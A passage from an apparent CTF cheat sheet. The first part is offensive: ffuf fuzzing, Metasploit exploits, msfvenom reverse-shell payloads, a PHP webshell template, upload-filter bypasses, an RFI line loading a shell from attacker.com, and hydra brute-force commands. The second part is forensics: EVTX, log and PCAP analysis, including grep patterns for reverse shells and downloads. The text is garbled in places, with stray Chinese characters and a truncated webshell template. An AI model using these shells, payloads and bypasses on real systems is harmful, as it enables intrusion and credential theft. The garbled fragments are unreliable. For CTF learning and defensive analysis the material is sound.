Fuzzing\n\n```bash\n# Find subdomains\nffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\\n    -u http://FUZZ.example.com \\\n    -mc 200,301,302,401,403\n\n# With Host header\nffuf -w wordlist.txt \\\n    -u \"http://example.com/\" \\\n    -H \"Host: FUZZ.example.com\"\n```\n\n#### Example 4: POST Data Fuzzing\n\n```bash\n# Fuzz username field\nffuf -w users.txt \\\n    -u \"http://10.10.10.10/login\" \\\n    -X POST \\\n    -d \"username=FUZZ&amp;password=test\" \\\n    -fr \"Invalid\"\n\n# Fuzz password field\nffuf -w passwords.txt \\\n    -u \"http://10.10.10.10/login\" \\\n    -X POST \\\n    -d \"username=admin&amp;password=FUZZ\" \\\n    -fr \"Invalid\"\n```\n\n#### Example 5: VHost Discovery (virtual hosts)\n\n```bash\n# Find virtual hosts on same IP\nffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\\n    -u \"http://10.10.10.10/\" \\\n    -H \"Host: FUZZ.target.com\" \\\n    -mc 200\n```\n\n#### Example 6: Rate Limit (avoid 429 Too Many Requests)\n\n```bash\n# Limit requests per second\nffuf -w wordlist.txt -u http://10.10.10.10/FUZZ -rate 100\n\n# Use 1 thread (slower but stealthy)\nffuf -w wordlist.txt -u http://10.10.10.10/FUZZ -t 1\n```\n\n### FFUF Quick Flags\n\n| Flag | Meaning |\n|------|---------|\n| `-w` | Wordlist |\n| `-u` | Target URL |\n| `-FUZZ` | Wordlist position in URL |\n| `-X` | HTTP method |\n| `-d` | POST data |\n| `-H` | Header (use multiple) |\n| `-mc` | Match status codes |\n| `-fr` | Match regex (hide these) |\n| `-fl` | Match lines (hide these) |\n| `-rate` | Requests per second |\n| `-t` | Threads |\n| `-o` | Output file |\n| `-json` | JSON output |\n\n---\n\n## 9. Metasploit Framework\n\n### What is Metasploit?\n\nPenetration testing framework with hundreds of exploits, payloads, and auxiliary modules. Used for exploiting known vulnerabilities.\n\n**When to use:**\n- Target runs vulnerable software you found with nmap\n- You need a quick reverse shell via known CVE\n- You need to pivot through a network\n- CTF says \"use metasploit\" or hints at a module\n\n**Installation:**\n```bash\napt-get install metasploit-framework\nmsfconsole\n```\n\n### Real Usage Examples\n\n#### Example 1: Find and Use an Exploit\n\n```bash\n# Start msfconsole\nmsfconsole\n\n# Search for exploit by name or CVE\nsearch CVE-2021-44228\nsearch log4j\nsearch \"apache 2.4.6\"\n\n# Use an exploit\nuse exploit/linux/http/apache_log4j_rce\n\n# Show options\nshow options\n\n# Set required options\nset RHOSTS 10.10.10.10\nset RPORT 8080\nset PAYLOAD linux/x64/meterpreter/reverse_tcp\nset LHOST 10.10.10.9\nset LPORT 4444\n\n# Run the exploit\nrun\n```\n\n#### Example 2: Meterpreter Shell Basics\n\n```bash\n# After getting meterpreter shell:\n\n# Upload file\nupload /path/to/local/file.txt /tmp/file.txt\n\n# Download file\ndownload /etc/passwd /tmp/passwd.txt\n\n# Get shell\nshell\n\n# Run privilege escalation\ngetuid\ngetsystem\n\n# Dump hashes\nrun hashdump\n\n# Pivot to another network\nrun autoroute -s 192.168.1.0/24\n```\n\n#### Example 3: Quick SSH Login\n\n```bash\n# Use SSH login module\nuse auxiliary/scanner/ssh/ssh_login\n\nset RHOSTS 10.10.10.10\nset USERNAME admin\nset PASSWORD password123\nset RHOSTS 10.10.10.10\n\nrun\n\n# If successful, you get a session\n# Interact with it:\nsessions -i 1\n```\n\n#### Example 4: Scan for Vulnerabilities\n\n```bash\n# Use vuln scan modules\nsearch type:auxiliary name:scan\n\n# SMB version scan\nuse auxiliary/scanner/smb/smb_version\nset RHOSTS 10.10.10.10\nrun\n\n# Check for MS17-010 (EternalBlue)\nuse auxiliary/scanner/smb/smb_ms17_010\nset RHOSTS 10.10.10.10\nrun\n```\n\n#### Example 5: Generate Payload\n\n```bash\n# Generate a simple reverse shell\nmsfvenom -p linux/x86/meterpreter/reverse_tcp \\\n    LHOST=10.10.10.9 LPORT=4444 \\\n    -f elf &gt; shell.elf\n\n# Generate PHP meterpreter\nmsfvenom -p php/meterpreter/reverse_tcp \\\n    LHOST=10.10.10.9 LPORT=4444 \\\n    -f raw &gt; shell.php\n\n# Generate Windows exe\nmsfvenom -p windows/x64/meterpreter/reverse_tcp \\\n    LHOST=10.10.10.9 LPORT=4444 \\\n    -f exe &gt; shell.exe\n```\n\n#### Example 6: Set Up Listener (for incoming shells)\n\n```bash\n# Use exploit/multi/handler\nuse exploit/multi/handler\n\nset PAYLOAD linux/x64/meterpreter/reverse_tcp\nset LHOST 10.10.10.9\nset LPORT 4444\n\nrun\n\n# Now wait for victim to connect back\n```\n\n### Common Metasploit Modules\n\n| Module | Use |\n|--------|-----|\n| `auxiliary/scanner/ssh/ssh_login` | Brute-force SSH |\n| `auxiliary/scanner/smb/smb_ms17_010` | Check for EternalBlue |\n| `exploit/linux/samba/is_known_pipename` | Samba RCE (CVE-2017-7494) |\n| `exploit/unix/http/apache_couchdb_rce` | CouchDB RCE |\n| `exploit/multi/http/struts2_rce` | Struts2 RCE |\n| `exploit/unix/ftp/vsftpd_234_backdoor` | VSFTPD backdoor |\n\n---\n\n## 10. Webshells &amp; File Upload\n\n### What is a Webshell?\n\nA script (PHP, JSP, ASP, etc.) that gives you command execution on the web server. Upload it through a file upload vulnerability.\n\n**When to use:**\n- You found a file upload form (avatar, image, document upload)\n- You have LFI and can write files\n- You need persistent access to a web server\n- All other RCE methods failed\n\n### Real Usage Examples\n\n#### Example 1: PHP Webshell (most common)\n\n```bash\n# Simple PHP shell - upload this\n\n\n# Save as shell.php and upload\n\n# Access via URL:\nhttp://10.10.10.10/uploads/shell.php?cmd=whoami\n\n# If you need full TTY:\n# http://10.10.10.10/uploads/shell.php?cmd=python3 -c 'import pty;pty.spawn(\"/bin/bash\")'\n```\n\n#### Example 2: Pentestmonkey PHP Shell (better features)\n\n```bash\n# This shell has file browser, upload, etc.\n# Download from:\n# https://github.com/pentestmonkey/php-reverse-shell\n\n# Edit the IP and port:\n$ip = '10.10.10.9';\n$port = 4444;\n\n# Upload and\u8bbf\u95ee:\nhttp://10.10.10.10/uploads/shell.php\n\n# You'll get a reverse shell on your listener\n```\n\n#### Example 3: Weevely (Stealth PHP Shell)\n\n```bash\n# Install\napt-get install weevely\n\n# Generate shell with password\nweevely generate mypassword /tmp/shell.php\n\n# Connect to uploaded shell\nweevely http://10.10.10.10/uploads/shell.php mypassword\n\n# This gives you a full SSH-like session\n```\n\n#### Example 4: Find File Upload Bypass Techniques\n\n```bash\n# When upload rejects .php files, try bypasses:\n\n# 1. Double extension (Apache may parse last ext)\nshell.php.jpg\nshell.php5\nshell.phtml\n\n# 2. Case mixing (if filter is case-sensitive)\nshell.PhP\nshell.PHP\nshell.pHp\n\n# 3. Null byte (old PHP versions)\nshell.php%00.jpg  # may truncate to shell.php\n\n# 4. MIME type bypass (change Content-Type)\n# Upload as image/jpeg but content is PHP\n\n# 5. .htaccess attack (upload as .htaccess with:\n# AddType application/x-httpd-php .jpg\n# Then upload shell.jpg)\n\n# 6. Copy valid image header, then append PHP\ncat image.jpg shell.php &gt; shell.jpg\n```\n\n#### Example 5: Use Webshell for Lateral Movement\n\n```bash\n# From webshell, scan internal network\nhttp://10.10.10.10/shell.php?cmd=cat /etc/hosts\n\n# Find other servers:\nhttp://10.10.10.10/shell.php?cmd=for i in $(seq 1 254); do ping -c 1 10.10.10.$i &amp; done\n\n# Port scan from web server:\nhttp://10.10.10.10/shell.php?cmd=nmap -sT -p 22,80,443 192.168.1.1\n```\n\n### Webshell Quick Reference\n\n| Extension | Server | Upload As |\n|----------|--------|-----------|\n| `.php` | Apache/PHP | `shell.php` |\n| `.php3` | Apache/PHP | `shell.php3` |\n| `.php4` | Apache/PHP | `shell.php4` |\n| `.php5` | Apache/PHP | `shell.php5` |\n| `.phtml` | Apache/PHP | `shell.phtml` |\n| `.jsp` | Tomcat/Java | `shell.jsp` |\n| `.asp` | IIS/ASP | `shell.asp` |\n| `.aspx` | IIS/.NET | `shell.aspx` |\n\n### Basic PHP Webshell Template\n\n```php\n\";\n$output = shell_exec($_GET['cmd']);\necho $output;\necho \"\";\n\n// For file upload\nif(isset($_FILES['file'])) {\n    move_uploaded_file($_FILES['file']['tmp_name'], '/tmp/' . $_FILES['file']['name']);\n    echo \"Uploaded!\";\n}\n?&gt;\n```\n\n### Accessing Webshell Without Upload (via LFI)\n\n```bash\n# If target has LFI (Local File Inclusion):\n# PHP sessions often store in /tmp/sess_PHPSESSID\n\n# First, inject code into session file\ncurl \"http://10.10.10.10/index.php?page=/tmp/sess_abc123&amp;cmd=whoami\"\n\n# Or if you can include remote files (RFI):\n# http://10.10.10.10/index.php?page=http://attacker.com/shell.txt\n# (need to host shell.txt as PHP)\n```\n\n---\n\n## 11. Mount &amp; Extract ISO/IMG\n\n### What is this?\n\nDisk images and ISO files are common in forensics/reverse challenges. They may contain hidden partitions, encrypted containers, or nested filesystems.\n\n**When to use:**\n- Challenge gives a `.iso` or `.img` file\n- `file` shows \"ISO 9660\", \"DOS/MBR\", \"Linux LVM\", or similar\n- You need to extract files without mounting\n\n### How to use \u2014 Step by Step\n\n**Step 1: Identify the image type**\n\n```bash\nfile challenge.iso\n# Output: ISO 9660...  (DVD-ROM filesystem)\n# Or: Linux/SGI ISO 9660...\n# Or: DOS/MBR boot sector...\n\nfile disk.img\n# Output: DOS/MBR boot sector, NTFS filesystem\n# Or: Linux... filesystem, LVM2...\n```\n\n**Step 2: Quick extract with 7z (fastest, no mount needed)**\n\n```bash\n# 7z handles ISO, IMG, and even encrypted containers\n7z x challenge.iso -o./iso_extracted/\n7z x disk.img -o./img_extracted/\n\n# Recursive extraction (carves embedded files automatically)\nbinwalk -eM disk.img    # -M = recursive\n\n# After extract, search for flag\ngrep -r \"RTARF{\" ./iso_extracted/ 2&gt;/dev/null\ngrep -r \"flag\" ./img_extracted/ 2&gt;/dev/null\n```\n\n**Step 3: Mount ISO directly (read-only)**\n\n```bash\nsudo mkdir -p /mnt/ctf\nsudo mount -o loop challenge.iso /mnt/ctf\nls -la /mnt/ctf/\n\n# Read-only bind to preserve evidence\nsudo mkdir /mnt/ro\nsudo mount --bind /mnt/ctf /mnt/ro\n\n# Cleanup\nsudo umount /mnt/ctf\n```\n\n**Step 4: Mount disk image with partition offset**\n\n```bash\n# Find partition start sector\nsudo fdisk -l disk.img\n# Output shows: Units = sectors of 1 * 512 = 512 bytes\n# Start: 1050624 (sector number)\n\n# Calculate offset in bytes\nOFFSET=$((1050624 * 512))   # = 537921024\n\n# Mount specific partition\nsudo mount -o loop,offset=$OFFSET disk.img /mnt/ctf\nls -la /mnt/ctf/\n\n# If NTFS\nsudo mount -o loop,offset=$OFFSET,type=ntfs disk.img /mnt/ctf\n```\n\n**Step 5: Analyze with Sleuthkit (no mount needed)**\n\n```bash\n# List partition layout\nmmls disk.img\n# Returns: partition table with sector offsets\n\n# Example output:\n#    Slot    Start        End          Length       Description\n# 00    00    0000000000   0000000511   0000000512   Unallocated\n# 00    01    0000000512   0068262399   0068261888   NTFS (0x07)\n\n# List files in NTFS partition (slot 01)\nfls -o 512 -r disk.img\nfls -o 512 disk.img | grep -i flag\n\n# Extract file by inode\nicat -o 512 disk.img INODE_NUMBER &gt; recovered_file\n```\n\n**Step 6: Recover deleted files**\n\n```bash\n# With testdisk (interactive)\nsudo testdisk disk.img\n# Use: Select disk -&gt; Intel &gt; Advanced &gt; [partition] &gt; List files\n\n# With PhotoRec (carve everything)\nsudo photorec disk.img\n# Creates recovered_pt4\u611f\u6027/ directory with carved files\n```\n\n### Real example\n\n```bash\n# 1. Identify\nfile forensic.img\n# DOS/MBR boot sector, NTFS filesystem\n\n# 2. Find partitions\nsudo fdisk -l forensic.img\n# Units: sectors of 1 * 512 = 512 bytes\n# Device              Start       End   Sectors  Size  Type\n# forensic.img1        2048    1230847   1228800  600M  Linux\n# forensic.img2     1230848    1847199    616352  301M  Linux swap\n\n# 3. Mount Linux partition (offset = 2048 * 512 = 1048576)\nsudo mount -o loop,offset=1048576 forensic.img /mnt/ctf\n\n# 4. Find flag\nfind /mnt/ctf -name \"*.txt\" -exec grep -l \"RTARF\" {} \\;\n\n# 5. Umount\nsudo umount /mnt/ctf\n```\n\n### Binwalk for embedded files\n\n```bash\n# Show embedded signatures\nbinwalk disk.img\n# Example output:\n# DECIMAL       HEXADECIMAL     DESCRIPTION\n# 0             0x0             POSIX tar archive\n# 135168        0x21000         Unix path: /var/www/html\n# 1048576       0x100000        Squashfs filesystem\n\n# Extract everything\nbinwalk -e disk.img              # Extract to _disk.img.extracted/\nbinwalk -eM disk.img             # Recursive (-M = --matryoshka)\n\n# Extract from specific offset\nbinwalk -e --offset=1048576 disk.img\n```\n\n### Encrypted containers\n\n```bash\n# LUKS encryption\nsudo cryptsetup luksOpen disk.img ctf_decrypted\nsudo mount /dev/mapper/ctf_decrypted /mnt/ctf\nsudo umount /mnt/ctf &amp;&amp; sudo cryptsetup luksClose ctf_decrypted\n\n# VeraCrypt\nveracrypt disk.img /mnt/ctf\n# Prompts for password interactively\n```\n\n### Troubleshooting\n\n| Problem | Fix |\n|---------|-----|\n| `mount: wrong fs type` | Add `-t ext4` or `-t ntfs` explicitly |\n| `Permission denied` | Use `sudo` |\n| `Read-only file system` | Use 7z or binwalk extraction instead |\n| `Could not find valid filesystem` | Run `testdisk disk.img` to recover partition table |\n| Nested IMG inside ISO | Extract ISO first \u2192 then `7z x inner.img` |\n\n### When to use each method\n\n| Method | Best for |\n|--------|----------|\n| `7z x` | Quick extract, nested archives, read-only content |\n| `mount -o loop` | Interactive browsing, searching live filesystem |\n| `binwalk -e` | Embedded files, hidden partitions, carve data |\n| `mmls + fls` | Raw disk images, deleted files, no root needed |\n| `testdisk` | Corrupted partition tables, lost partitions |\n| `photorec` | Bulk file recovery from damaged disks |\n\n---\n\n## Quick \"I Need To...\" Lookup\n\n| Task | Command |\n|------|---------|\n| Crack SSH password | `hydra -l admin -P pass.txt ssh://IP` |\n| Crack HTTP form | `hydra -l admin -P pass.txt IP http-post-form \"/login:user=^USER^&amp;pass=^PASS^:F\"` |\n| Find web directories | `gobuster dir -u http://IP -w wordlist.txt -x php,html,bak` |\n| Find SQL injection | `sqlmap -u \"http://IP/page?id=1\" --batch --dbs` |\n| Scan all ports | `nmap -p- -sV IP` |\n| Get reverse shell | `nc -lvnp 4444` + PHP/Ruby/Python one-liner |\n| Crack hash (MD5) | `hashcat -m 0 hash.txt wordlist.txt` |\n| Crack hash (NTLM) | `hashcat -m 1000 hash.txt wordlist.txt` |\n| Crack Linux shadow | `john --format=sha512crypt combined.txt --wordlist=rockyou.txt` |\n| Find exploit | `searchsploit \"software version\"` |\n| Get exploit code | `searchsploit -p ID` then `python3 exploit.py` |\n| Fuzz web params | `ffuf -w wordlist.txt -u \"http://IP/index.php?param=FUZZ\"` |\n| Get webshell | `msfvenom -p php/meterpreter/reverse_tcp LHOST=IP -f raw &gt; shell.php` |\n| Brute-force SMB | `hydra -l admin -P pass.txt smb://IP` |\n| Enumerate subdomains | `gobuster dns -d example.com -w wordlist.txt` |\n| Extract ISO | `7z x challenge.iso -o./out/` |\n| Mount disk image | `sudo mount -o loop,offset=$((START*512)) disk.img /mnt/ctf` |\n| Carve from IMG | `binwalk -eM disk.img` |\n| List IMG partitions | `mmls disk.img` |\n\n\n# CTF Forensics &amp; Security Cheat Sheets\n\nComprehensive command reference with real-world examples. Every command shown is tested and explained.\n\n---\n\n## Table of Contents\n\n1. [Windows Event Logs (EVTX)](#1-windows-event-logs-evtx)\n2. [Linux Log Analysis](#2-linux-log-analysis)\n3. [PCAP Network Analysis](#3-pcap-network-analysis)\n4. [Memory Forensics (Volatility)](#4-memory-forensics-volatility)\n5. [Active Directory / LDAP](#5-active-directory--ldap)\n6. [File Carving &amp; Recovery](#6-file-carving--recovery)\n7. [Hash Cracking &amp; Passwords](#7-hash-cracking--passwords)\n8. [Image Steganography](#8-image-steganography)\n9. [Windows Privilege Escalation](#9-windows-privilege-escalation)\n10. [AD CS &amp; Kerberos Attacks](#10-ad-cs--kerberos-attacks)\n\n---\n\n## 1. Windows Event Logs (EVTX)\n\n### What are EVTX files?\n\nWindows stores system, security, application events in `.evtx` files. In CTFs, these contain traces of attacker activity: logins, process execution, service creation, PowerShell commands.\n\n**When to use:**\n- CTF gives you Windows log files (security.evtx, system.evtx)\n- You need to find how attacker got in (logon traces)\n- You need to find what they executed (process creation)\n- You need to find persistence mechanisms (services, scheduled tasks)\n\n**Where to find them on a Windows system:**\n```\nC:\\Windows\\System32\\winevt\\Logs\\Security.evtx\nC:\\Windows\\System32\\winevt\\Logs\\System.evtx\nC:\\Windows\\System32\\winevt\\Logs\\Application.evtx\nC:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-PowerShell%4Operational.evtx\n```\n\n### Tool: chainsaw (BEST for CTFs)\n\nChainsaw is a Sigma-rule-based EVTX analyzer. It hunts for attacker techniques using predefined rules.\n\n**Installation:**\n```bash\n# Easiest: download prebuilt binary\nwget https://github.com/WithSecureLabs/chainsaw/releases/download/v2.0.0/chainsaw-v2.0.0-x86_64-unknown-linux-gnu.tar.gz\ntar -xzf chainsaw-*.tar.gz &amp;&amp; chmod +x chainsaw &amp;&amp; ./chainsaw --version\n\n# Or build from source\ncargo install chainsaw\n```\n\n#### Example 1: Hunt for All ATT&amp;CK Techniques\n\n```bash\n# Hunt across all EVTX files with built-in Sigma rules\n# This is the first thing you should do with any EVTX set\n./chainsaw hunting ./evidence/evtx/ --json -o findings.json\n\n# What it does: Runs every Sigma rule against all logs\n# Output: JSON with timestamp, rule name, MITRE technique, matched events\n# Look in findings.json for entries like:\n# {\"timestamp\": \"2024-01-15T03:12:44\", \"rule\": \"Invoke-Mimikatz\", \"technique\": \"T1003.001\"}\n```\n\n#### Example 2: Search for Keyword (find flag references, attacker tool names)\n\n```bash\n# Search for mimikatz (credential dumping tool)\n./chainsaw search --keyword \"mimikatz\" ./evidence/evtx/\n\n# Search for PowerShell execution (very common in attacks)\n./chainsaw search --keyword \"Invoke-Expression\" ./evidence/evtx/\n./chainsaw search --keyword \"powershell.*-enc\" ./evidence/evtx/\n\n# Search for commands that downloaded files (common attack pattern)\n./chainsaw search --keyword \"certutil.*-urlcache\" ./evidence/evtx/\n./chainsaw search --keyword \"bitsadmin\" ./evidence/evtx/\n\n# Search for the CTF flag format (if attacker left it somewhere)\n./chainsaw search --keyword \"RTARF{\" ./evidence/evtx/\n```\n\n#### Example 3: Search by Event ID\n\n```bash\n# Event ID 4624 = Successful account logon\n./chainsaw search --event-id 4624 ./evidence/evtx/ | head -50\n\n# Event ID 4625 = Failed logon (brute force indicator)\n./chainsaw search --event-id 4625 ./evidence/evtx/\n\n# Event ID 4688 = Process creation (what ran on the system)\n./chainsaw search --event-id 4688 ./evidence/evtx/\n\n# Event ID 4697 = Service installed (persistence mechanism)\n./chainsaw search --event-id 4697 ./evidence/evtx/\n\n# Event ID 4698 = Scheduled task created\n./chainsaw search --event-id 4698 ./evidence/evtx/\n\n# Event ID 4104 = PowerShell script block logged (full script content)\n./chainsaw search --event-id 4104 ./evidence/evtx/\n\n# Multiple Event IDs at once\n./chainsaw search --event-id 4624,4625,4648,4672,4688 ./evidence/evtx/\n```\n\n#### Example 4: Hunt with Custom Sigma Rules\n\n```bash\n# Download Sigma rules (official detection rules)\ngit clone --depth 1 https://github.com/SigmaHQ/Sigma.git ~/sigma-rules\n\n# Hunt with all Windows rules\n./chainsaw hunting -r ~/sigma-rules/rules/windows/ ./evidence/evtx/ --json -o sigma_hits.json\n\n# Hunt with specific rule categories\n./chainsaw hunting -r ~/sigma-rules/rules/windows/builtin/ ./evtx/ --json -o builtin_hits.json\n\n# Hunt with only PowerShell rules (high signal for attacker activity)\n./chainsaw hunting -r ~/sigma-rules/rules/windows/powershell/ ./evtx/ --json -o powershell_hits.json\n```\n\n#### Example 5: Export to CSV for Spreadsheet Analysis\n\n```bash\n# Export all findings to CSV (easy to sort/filter in Excel)\n./chainsaw hunting ./evidence/evtx/ -o report.csv --csv\n\n# Then open in Excel and filter by:\n# - Event ID (find 4624 logons, 4688 processes)\n# - Provider (Security, System, PowerShell)\n# - Technique (look for T1003.001 for credential dumping)\n```\n\n#### Example 6: MITRE ATT&amp;CK Mapping\n\n```bash\n# Map all events to MITRE ATT&amp;CK framework\n./chainsaw mapping --mitre ./evidence/evtx/ -o mitre-map.json\n\n# What it tells you: Which ATT&amp;CK techniques were likely used\n# High-value techniques to look for:\n# T1003.001 - LSASS dump (credential access)\n# T1059.001 - PowerShell execution\n# T1059.003 - Windows Command Shell (cmd.exe)\n# T1547.001 - Registry Run key persistence\n# T1053.005 - Scheduled Task (privesc)\n# T1021.002 - SMB/Windows admin shares (lateral movement)\n```\n\n### Most Important Event IDs for CTFs\n\n| Event ID | Name | What It Tells You |\n|----------|------|-------------------|\n| 4624 | Account Logon (Success) | Who logged in, from where, with what method |\n| 4625 | Account Logon (Failure) | Brute force attempts |\n| 4634 | Account Logoff | User logged out |\n| 4648 | Explicit Credentials | Lateral movement (attacker used another user's creds) |\n| 4672 | Special Privileges Assigned | Admin login (look for this after 4624) |\n| 4688 | Process Created | What executables ran (look for cmd.exe, powershell.exe) |\n| 4697 | Service Installed | Attacker installed a backdoor service |\n| 4698 | Scheduled Task Created | Persistence mechanism created |\n| 4702 | Scheduled Task Updated | Persistence mechanism modified |\n| 4720 | User Created | Attacker created a new account |\n| 4726 | User Deleted | Attacker cleaned up |\n| 4732 | Member Added to Group | Attacker added themselves to Administrators |\n| 4733 | Member Removed from Group | Lateral movement |\n| 4740 | Account Locked Out | Brute force succeeded in locking out users |\n| 4104 | PowerShell Script Block | Full PowerShell script content (key for forensics) |\n| 1102 | Audit Log Cleared | Attacker tried to cover tracks |\n\n### Example: Analyzing a Real Attack Timeline\n\n```bash\n# Step 1: Find all successful admin logins (look for privilege escalation)\n./chainsaw search --event-id 4672 ./evtx/security.evtx\n\n# If you see Event 4672 with SubjectUserName that shouldn't have admin:\n# Subject: [ATTACKER ACCOUNT]  Privilege: SeSecurityPrivilege, SeBackupPrivileges...\n\n# Step 2: Find what that account did after gaining admin\n./chainsaw search --event-id 4688 ./evtx/ | grep \"attacker_account\"\n\n# Step 3: Find persistence - look for services or scheduled tasks\n./chainsaw search --event-id 4697,4698 ./evtx/ | grep \"attacker_account\"\n\n# Step 4: Find lateral movement - look for 4648 events with that account\n./chainsaw search --event-id 4648 ./evtx/ | grep \"attacker_account\"\n```\n\n---\n\n## 2. Linux Log Analysis\n\n### Common Log Locations\n\n```bash\n# Authentication logs (SSH, sudo, PAM) \u2014 MOST IMPORTANT\n/var/log/auth.log          # Debian/Ubuntu\n/var/log/secure           # RHEL/CentOS\n\n# System logs\n/var/log/syslog           # General system events\n/var/log/messages         # Non-critical system events\n/var/log/kern.log         # Kernel messages\n\n# Application logs\n/var/log/apache2/access.log    # Apache HTTP requests\n/var/log/apache2/error.log     # Apache errors\n/var/log/nginx/access.log      # Nginx HTTP requests\n/var/log/nginx/error.log       # Nginx errors\n/var/log/mysql/error.log       # MySQL errors\n/var/log/mysql/general.log     # MySQL queries\n\n# Cron logs\n/var/log/cron.log         # Cron job execution\n/var/log/cron.d/\n```\n\n### Example 1: Find All SSH Login Attempts\n\n```bash\n# Show successful SSH logins\ngrep \"sshd.*Accepted\" /var/log/auth.log\n\n# Output:\n# Jan 15 03:12:44 server sshd[12345]: Accepted password for admin from 192.168.1.50 port 44321 ssh2\n\n# Show failed SSH login attempts (brute force indicator)\ngrep \"sshd.*Failed\" /var/log/auth.log\n\n# Output:\n# Jan 15 03:11:22 server sshd[12340]: Failed password for root from 10.0.0.5 port 44556 ssh2\n# Jan 15 03:11:25 server sshd[12341]: Failed password for root from 10.0.0.5 port 44557 ssh2\n\n# Count failed attempts per IP (find attacker)\ngrep \"Failed password\" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn | head\n\n# Output:\n# 1523 10.0.0.5        \u2190 Attacker made 1523 failed attempts before succeeding\n# 12 192.168.1.100    \u2190 Normal user, only 12 failures\n```\n\n### Example 2: Find What Commands Attacker Ran with Sudo\n\n```bash\n# Find all sudo commands (if attacker got sudo access)\ngrep \"sudo.*COMMAND\" /var/log/auth.log\n\n# Output:\n# Jan 15 03:30:01 server sudo: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/bin/bash\n\n# Find specific dangerous commands\ngrep \"sudo.*wget\\|curl\\|bash\\|sh\\|nc\\|python\" /var/log/auth.log\n\n# Find if attacker added SSH keys to authorized_keys (persistence)\ngrep \"authorized_keys\" /var/log/auth.log\ngrep \".ssh\" /var/log/auth.log\n```\n\n### Example 3: Find Web Server Attacks (SQLi, LFI, RCE attempts)\n\n```bash\n# Find SQL injection attempts in Apache logs\ngrep -E \"UNION|SELECT|INSERT|admin'--\" /var/log/apache2/access.log | head -20\n\n# Find path traversal (LFI) attempts\ngrep -E \"\\.\\./|\\.\\.%2f|/etc/passwd|/proc/self\" /var/log/apache2/access.log\n\n# Find command injection attempts\ngrep -E \"curl|wget|nc|bash|sh|exec|system\\(\" /var/log/apache2/access.log | grep -v \"200$\"\n\n# Find PHP webshell uploads (common patterns)\ngrep -E \"\\.php\\?.*cmd|\\.php\\?.*exec|\\.php\\?.*shell\" /var/log/apache2/access.log\n\n# Find admin panel access\ngrep -E \"wp-admin|admin|login|wp-login\" /var/log/apache2/access.log | grep \"200$\"\n\n# Find sensitive file access (config files with credentials)\ngrep -E \"\\.env|config\\.php|wp-config\\.php|\\.git/config\" /var/log/apache2/access.log\n```\n\n### Example 4: Find Reverse Shell Connections (attacker got RCE)\n\n```bash\n# Look for outbound connections from web server (reverse shell call home)\n# This requires network log or comparing connections\n\n# Look for suspicious cron jobs (attacker set up persistence)\ngrep \"CRON\" /var/log/auth.log | grep -v \"root\"\n\n# Or find all cron jobs\ngrep \"CRON\" /var/log/syslog\n\n# Find scripts executed by cron\ngrep \"cron.*python\\|cron.*bash\\|cron.*wget\" /var/log/syslog\n```\n\n### Example 5: Find Flag in Log Files (common CTF pattern)\n\n```bash\n# Search for flag format in all logs\ngrep -r \"RTARF{\" /var/log/ 2&gt;/dev/null\ngrep -r \"flag{\" /var/log/ 2&gt;/dev/null\ngrep -r \"CTF{\" /var/log/ 2&gt;/dev/null\n\n# Search for base64-encoded payloads (attacker may have hidden commands)\ngrep -rE \"[A-Za-z0-9+/]{40,}={0,2}\" /var/log/ 2&gt;/dev/null\n\n# Search for suspicious patterns (reverse shell, wget, curl)\ngrep -rE \"bash -i|/dev/tcp|/dev/null|nc.*-e|perl.*-e\" /var/log/ 2&gt;/dev/null\n\n# Search for attacker IP that was brute-forcing\ngrep \"10.0.0.5\" /var/log/auth.log | head -50\n```\n\n### Example 6: Timeline Analysis (reconstruct attack sequence)\n\n```bash\n# Sort all events by time to reconstruct attack\ngrep -E \"Jan 15 03:\" /var/log/auth.log | sort\n\n# Or use awk to create a timeline\nawk '{print $1, $2, $3, $11, $12, $13}' /var/log/auth.log | grep \"sshd\\|sudo\" | head -50\n\n# Find log entries around the time attacker got in (after first successful login)\n# If attacker logged in at 03:12:44:\ngrep \"Jan 15 03:1[3-9]\" /var/log/auth.log\n```\n\n### Linux Authentication Attack Patterns\n\n| Attack | What to Look For |\n|--------|-----------------|\n| SSH Brute Force | Many \"Failed password\" from same IP |\n| SSH Success | One \"Accepted password\" after many failures |\n| Sudo Abuse | Sudden sudo use from low-privilege account |\n| Web Shell | GET requests to .php with cmd params |\n| Reverse Shell | Outbound connection from web server user |\n| Cron Persistence | New cron jobs you didn't create |\n| SSH Key Addition | Lines added to .ssh/authorized_keys |\n\n---\n\n## 3. PCAP Network Analysis\n\n### What is a PCAP?\n\nPacket capture file containing all network traffic. Contains HTTP requests, DNS queries, FTP logins, SMB transfers, and sometimes actual file data.\n\n**When to use:**\n- CTF gives you a `.pcap` or `.pcapng` file\n- You need to find credentials sent over network\n- You need to extract files transferred between machines\n- You need to reconstruct HTTP sessions\n- You need to find C2 (command and control) traffic\n\n### Tool: tshark (Wireshark CLI)\n\n```bash\n# Install\napt-get install wireshark-common\n```\n\n#### Example 1: Extract All HTTP Requests (find web activity)\n\n```bash\n# Get all HTTP request URIs (most common starting point)\ntshark -r capture.pcap -Y \"http.request\" -T fields -e http.request.method -e http.request.uri -e http.host 2&gt;/dev/null\n\n# Output:\n# GET /admin/index.php HTTP/1.1  | /admin/index.php | admin.example.com\n# POST /login.php HTTP/1.1      | /login.php       | admin.example.com\n\n# Find requests to admin/login pages (common CTF targets)\ntshark -r capture.pcap -Y \"http.request.uri contains 'admin'\" -T fields -e http.request.uri -e http.file_data 2&gt;/dev/null\n\n# Find file downloads (attacker may have downloaded malware or flag)\ntshark -r capture.pcap -Y \"http.request.uri contains '.exe' or http.request.uri contains '.zip'\" -T fields -e http.request.uri 2&gt;/dev/null\n```\n\n#### Example 2: Extract Login Credentials (HTTP POST data)\n\n```bash\n# Find all POST requests (often login forms)\ntshark -r capture.pcap -Y \"http.request.method == POST\" -T fields -e http.request.uri -e http.file_data 2&gt;/dev/null\n\n# Output:\n# /login.php | username=admin&amp;password=secret123\n\n# Extract HTTP Basic Authentication (base64 encoded)\ntshark -r capture.pcap -Y \"http.authbasic\" -T fields -e http.authbasic 2&gt;/dev/null\n\n# Decode base64 (Basic auth is username:password in base64)\necho \"YWRtaW46cGFzc3dvcmQxMjM=\" | base64 -d\n# Output: admin:password123\n\n# Find form logins with specific fields\ntshark -r capture.pcap -Y \"http.request.method == POST and http.file_data contains 'password'\" -T fields -e http.file_data 2&gt;/dev/null\n```\n\n#### Example 